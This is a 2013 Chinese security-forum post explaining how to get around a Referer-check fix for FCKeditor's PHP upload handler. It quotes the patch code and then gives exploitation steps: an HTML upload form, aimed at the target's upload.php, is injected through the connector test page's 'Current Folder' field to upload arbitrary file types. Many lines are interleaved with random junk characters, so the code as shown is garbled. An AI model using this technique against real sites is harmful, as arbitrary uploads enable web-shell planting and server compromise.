找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2231|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php- U5 D, ^: S2 O+ |3 Z
网上给出的修复方案是6 i& Z4 D, H) V1 s1 n) H2 _
修复方法,删除FCK编辑器用其他的编辑器; D" H3 j5 v' C9 U6 x8 o' V; @$ Q
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
* C2 l, [( ^6 u9 Q, w
4 ?4 d7 ^6 {+ U  k+ A6 v1 yrequire(‘config.php’);- g, E" d! q- c( \
require(‘util.php’);+ p/ w0 x- T$ x4 {3 c6 V
的下面添加以下代码—————————–
2 I! `2 H/ r5 W% v7 W//防止外部提交, Q8 T$ b- R  N) ?2 C7 ]
function outsidepost()
6 G" m2 f5 [" J0 b& x# B6 [2 ]{
7 d/ C& i9 o/ L$ f$ r) K, K0 \$ E$servername=$_SERVER['SERVER_NAME'];
3 b" k9 Q( s  ^! B( C7 Q$sub_from=@$_SERVER['HTTP_REFERER'];6 s- [7 @. |+ w5 J- K# d7 w
$sub_len=strlen($servername);
. [- n6 w: B4 `+ S# l8 U$checkfrom=substr($sub_from,7,$sub_len);
3 h1 W5 A, T+ `7 O# \if($checkfrom!=$servername){" W( ^  c! ~8 I3 t; g4 q5 X% x) P
echo(“you don’t outsidepost!”);, ]' j- F: S! U, y0 D
exit;
: N7 r( z5 h$ ?8 B; k}
! l' C' U, V( Y; ]4 I# f+ l}( ?  O8 [. l3 H: B4 ^
outsidepost();' E  `: U" g2 R/ Y5 \. t
防止外部提交,但是没有防止内部提交,4 o* y" _- h: D5 J# k
利用方法:- T' R0 ^/ l% v& \5 W5 E  V5 S
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
1 g9 [( [. E: w$ P9 ~2,在Current Folder 框输入; ]6 d+ ]3 Z: K. s' j' F2 k  y
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>5 J+ J# R7 ?) b* _
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。$ r) |5 X; G% |$ {! n2 j* r5 p
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表